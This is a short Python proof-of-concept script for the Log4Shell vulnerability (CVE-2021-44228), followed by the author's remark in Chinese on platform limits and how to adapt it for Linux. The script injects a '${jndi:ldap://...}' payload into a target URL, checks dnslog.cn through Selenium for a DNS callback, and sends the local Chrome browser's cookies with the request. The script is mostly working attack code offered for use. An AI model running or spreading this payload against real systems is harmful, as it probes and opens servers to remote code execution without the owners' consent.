Poc_CVE-2021-44228
1 import requests 2 from selenium.webdriver import Chrome 3 from selenium.webdriver.support.ui import WebDriverWait 4 from selenium.webdriver.common.by import By 5 import time 6 import urllib.parse 7 import browser_cookie3 8 9 10 def jndi(dns): 11 dns = str(dns) 12 pay1 = '${jndi:ldap://' 13 pay2 = '/exp}' 14 pay_url1 = urllib.parse.quote(pay1) 15 pay_url2 = urllib.parse.quote(pay2) 16 pay_url = pay_url1 + dns +pay_url2 17 payload = 'payload='+str(pay_url) 18 return (payload) 19 20 def verify(dns): 21 time.sleep(5) 22 driver.find_element(By.XPATH, '//*[@id="content"]/button[2]').click() 23 time.sleep(5) 24 ver = driver.find_element(By.XPATH, '//*[@id="myRecords"]/tbody/tr[2]/td[1]') 25 re = dns 26 flag = re in str(ver.text) 27 28 if flag: 29 print("It looks likely vulnerable") 30 else: 31 print("It is strong") 32 33 def exploit(url,dns): 34 cookie = browser_cookie3.chrome() 35 payload = url+'/hello?'+jndi(dns) 36 response = requests.get(url=payload,cookies=cookie) 37 print(response.text) 38 verify(dns) 39 40 if __name__ == '__main__': 41 url = 'http://' + input('Please input your ip:port(such as--127.0.0.1:80):') 42 driver = Chrome() 43 driver.get("http://www.dnslog.cn/") 44 WebDriverWait(driver, 10).until(lambda d: "DNSLog" in d.title) 45 driver.find_element(By.XPATH, '//*[@id="content"]/button[1]').click() 46 time.sleep(5) 47 dns = driver.find_element(By.XPATH, '//*[@id="myDomain"]') 48 49 exploit(url,dns.text)
鄙人才疏学浅(再加上没有申请个人域名,毕竟太贵~),该poc仅限用于安装了chrome的windows系统,并不支持linux等。。如果有可用域名的话,将verify里的内容改为域名的访问,然后修改一下main函数,即可同样用于linux~